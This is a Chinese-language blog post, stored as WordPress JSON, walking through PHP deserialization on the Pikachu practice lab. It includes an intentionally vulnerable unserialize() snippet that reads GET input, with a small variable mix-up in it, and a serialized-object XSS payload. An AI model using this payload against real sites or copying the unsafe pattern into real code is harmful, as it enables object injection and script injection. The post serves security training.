{"id":255,"date":"2021-08-10T09:03:43","date_gmt":"2021-08-10T09:03:43","guid":{"rendered":"http:\/\/49.235.100.226\/?p=255"},"modified":"2021-08-31T08:40:18","modified_gmt":"2021-08-31T08:40:18","slug":"pikachu-phpfanxuliehua","status":"publish","type":"post","link":"http:\/\/www.nokws.top\/index.php\/2021\/08\/10\/pikachu-phpfanxuliehua\/","title":{"rendered":"Pikachu&#8211;PHP\u53cd\u5e8f\u5217\u5316"},"content":{"rendered":"\n<p><strong>\u5e8f\u5217\u5316serialize()<\/strong><br>\u5e8f\u5217\u5316\u8bf4\u901a\u4fd7\u70b9\u5c31\u662f\u628a\u4e00\u4e2a\u5bf9\u8c61\u53d8\u6210\u53ef\u4ee5\u4f20\u8f93\u7684\u5b57\u7b26\u4e32,\u6bd4\u5982\u4e0b\u9762\u662f\u4e00\u4e2a\u5bf9\u8c61:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">    class S{\n        public $test=\"pikachu\";\n    }\n    $s=new S(); \/\/\u521b\u5efa\u4e00\u4e2a\u5bf9\u8c61\n    serialize($s); \/\/\u628a\u8fd9\u4e2a\u5bf9\u8c61\u8fdb\u884c\u5e8f\u5217\u5316\n    \u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u7ed3\u679c\u662f\u8fd9\u4e2a\u6837\u5b50\u7684:O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}\n        O:\u4ee3\u8868object\n        1:\u4ee3\u8868\u5bf9\u8c61\u540d\u5b57\u957f\u5ea6\u4e3a\u4e00\u4e2a\u5b57\u7b26\n        S:\u5bf9\u8c61\u7684\u540d\u79f0\n        1:\u4ee3\u8868\u5bf9\u8c61\u91cc\u9762\u6709\u4e00\u4e2a\u53d8\u91cf\n        s:\u6570\u636e\u7c7b\u578b\n        4:\u53d8\u91cf\u540d\u79f0\u7684\u957f\u5ea6\n        test:\u53d8\u91cf\u540d\u79f0\n        s:\u6570\u636e\u7c7b\u578b\n        7:\u53d8\u91cf\u503c\u7684\u957f\u5ea6\n        pikachu:\u53d8\u91cf\u503c\n    <\/pre>\n\n\n\n<p><strong>\u53cd\u5e8f\u5217\u5316unserialize()<\/strong><\/p>\n\n\n\n<p>\u5c31\u662f\u628a\u88ab\u5e8f\u5217\u5316\u7684\u5b57\u7b26\u4e32\u8fd8\u539f\u4e3a\u5bf9\u8c61,\u7136\u540e\u5728\u63a5\u4e0b\u6765\u7684\u4ee3\u7801\u4e2d\u7ee7\u7eed\u4f7f\u7528\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">    $u=unserialize(\"O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}\");\n    echo $u-&gt;test; \/\/\u5f97\u5230\u7684\u7ed3\u679c\u4e3apikachu\n    <\/pre>\n\n\n\n<p>\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u672c\u8eab\u6ca1\u6709\u95ee\u9898,\u4f46\u662f\u5982\u679c\u53cd\u5e8f\u5217\u5316\u7684\u5185\u5bb9\u662f\u7528\u6237\u53ef\u4ee5\u63a7\u5236\u7684,\u4e14\u540e\u53f0\u4e0d\u6b63\u5f53\u7684\u4f7f\u7528\u4e86PHP\u4e2d\u7684\u9b54\u6cd5\u51fd\u6570,\u5c31\u4f1a\u5bfc\u81f4\u5b89\u5168\u95ee\u9898<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">        \u5e38\u89c1\u7684\u51e0\u4e2a\u9b54\u6cd5\u51fd\u6570:\n        __construct()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u521b\u5efa\u65f6\u88ab\u8c03\u7528\n\n        __destruct()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u9500\u6bc1\u65f6\u88ab\u8c03\u7528\n\n        __toString()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u88ab\u5f53\u4f5c\u4e00\u4e2a\u5b57\u7b26\u4e32\u4f7f\u7528\n\n        __sleep() \u5728\u5bf9\u8c61\u5728\u88ab\u5e8f\u5217\u5316\u4e4b\u524d\u8fd0\u884c\n\n        __wakeup\u5c06\u5728\u5e8f\u5217\u5316\u4e4b\u540e\u7acb\u5373\u88ab\u8c03\u7528\n\n        \u6f0f\u6d1e\u4e3e\u4f8b:\n\n        class S{\n            var $test = \"pikachu\";\n            function __destruct(){\n                echo $this->test;\n            }\n        }\n        $s = $_GET['test'];\n        @$unser = unserialize($a);\n\n        payload:O:1:\"S\":1:{s:4:\"test\";s:29:\"&lt;script>alert('xss')&lt;\/script>\";}    <\/pre>\n\n\n\n<p>\u8f93\u5165 O:1:&#8221;S&#8221;:1:{s:4:&#8221;test&#8221;;s:29:&#8221;alert(&#8216;xss&#8217;)&#8221;;}<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/49.235.100.226\/wp-content\/uploads\/2021\/08\/16285861671-1024x491.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"491\" data-original=\"http:\/\/49.235.100.226\/wp-content\/uploads\/2021\/08\/16285861671-1024x491.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-256\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>O:1:&#8221;S&#8221;:1:{s:4:&#8221;test&#8221;;s:7:&#8221;pikachu&#8221;;}<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/49.235.100.226\/wp-content\/uploads\/2021\/08\/16285861991.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"602\" height=\"267\" data-original=\"http:\/\/49.235.100.226\/wp-content\/uploads\/2021\/08\/16285861991.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-257\"  sizes=\"auto, (max-width: 602px) 100vw, 602px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u5e8f\u5217\u5316serialize()\u5e8f\u5217\u5316\u8bf4\u901a\u4fd7\u70b9\u5c31\u662f\u628a\u4e00\u4e2a\u5bf9\u8c61\u53d8\u6210\u53ef\u4ee5\u4f20\u8f93\u7684\u5b57\u7b26\u4e32,\u6bd4\u5982\u4e0b\u9762\u662f\u4e00\u4e2a\u5bf9\u8c61: class [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,4],"tags":[],"class_list":["post-255","post","type-post","status-publish","format-standard","hentry","category-pikachu","category-bachanglianxi"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/255","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/comments?post=255"}],"version-history":[{"count":1,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/255\/revisions"}],"predecessor-version":[{"id":258,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/posts\/255\/revisions\/258"}],"wp:attachment":[{"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/media?parent=255"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/categories?post=255"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.nokws.top\/index.php\/wp-json\/wp\/v2\/tags?post=255"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}